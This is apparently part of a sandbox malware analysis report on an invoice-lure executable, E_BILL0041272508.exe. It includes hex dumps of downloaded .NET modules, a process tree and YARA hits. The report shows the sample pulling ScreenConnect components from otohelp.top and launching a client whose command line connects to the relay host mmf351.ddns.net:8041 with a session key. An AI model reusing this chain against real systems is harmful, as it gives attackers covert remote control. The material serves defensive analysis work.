2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 Data Ascii: ,(o0Q(a-((b,({,((b,(o(a-(,({,(,(o(a-(,({,(,((*0(o(c
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 Data Ascii: 2{8o6{8o0){:(t\|:(O+30){:(t\|:(O+30)Z{:s%{9X}9o(P+f}9({8o(2{8o*2{8(r
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 Data Ascii: {=,{=o"{<,{<o",o"(`&4iA5$0J( "(,("?}s~(s}ts}q0){x(t\|x(+3*0
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 Data Ascii: (+~s`(!+(%-&(oA(~(oA(~oo.(o^.(oD.(oJ.(oL.(oH.(oB.(oD.(oF.(oD.(ob.(od.(of.(
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 Data Ascii: %(!+0EAs}s(+~%-&~s%(+0.B~r@pd(o,o""(s(,#(o(V(-ss*f(-s
2024-10-02 04:25:34 UTC	16384	IN	Data Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 Data Ascii: o((((v(#% o% o0(,+((((,((s;*(((((-d(((((-?(((((-((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49738	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:35 UTC	86	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:35 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:35 GMT Connection: close
2024-10-02 04:25:35 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 Data Ascii: &{l"}l:(<(m0(<oF{n-(++,}n{n>oo>(o}p03=-(qo{p_,B{r,(stsu(,+&}p\|r*o{p3{r
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(<(~%-&~s%(+0%(-o(-:((
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 Data Ascii: o:3oXo(Y+s9%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds;%(+(+(+-j+j(L(+&f__`v(
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 Data Ascii: (jX}{~(+0)Q{(+tO\|(+30)Q{(-tO\|(+3V(6}}{{Z(>Z((?X(=u}u}*(c,{(
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 Data Ascii: o-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{@{A0G*~-:~(,~
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 Data Ascii: :j*****0iY(`(2sjz(<.s2(<2{3oB(<6{o{(<6{o{.s8(<"(]"(c(<0{;(+d(zo60
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a Data Ascii: (V(<6{/o06{/o0(<J{"{#(1(<J{'{((1.s%(<o"oC.s((<oC.s(<"(R:NoC.s-(<:oC(<
2024-10-02 04:25:35 UTC	16384	IN	Data Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03 Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5

Target ID:	0
Start time:	00:25:10
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\E_BILL0041272508.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\E_BILL0041272508.exe"
Imagebase:	0x9b0000
File size:	83'352 bytes
MD5 hash:	9FFC98A16ABA4841E94B24CCABF219AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:25:10
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x23cca300000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	00:25:12
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:25:35
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
Imagebase:	0x7ff66e660000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:25:36
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0x20000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:25:36
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0x20000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:25:37
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User"
Imagebase:	0x20000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.8%
Total number of Nodes:	1471
Total number of Limit Nodes:	34

Executed Functions

Function 009B1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 009B1016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009B1025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009B1032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 009B1057
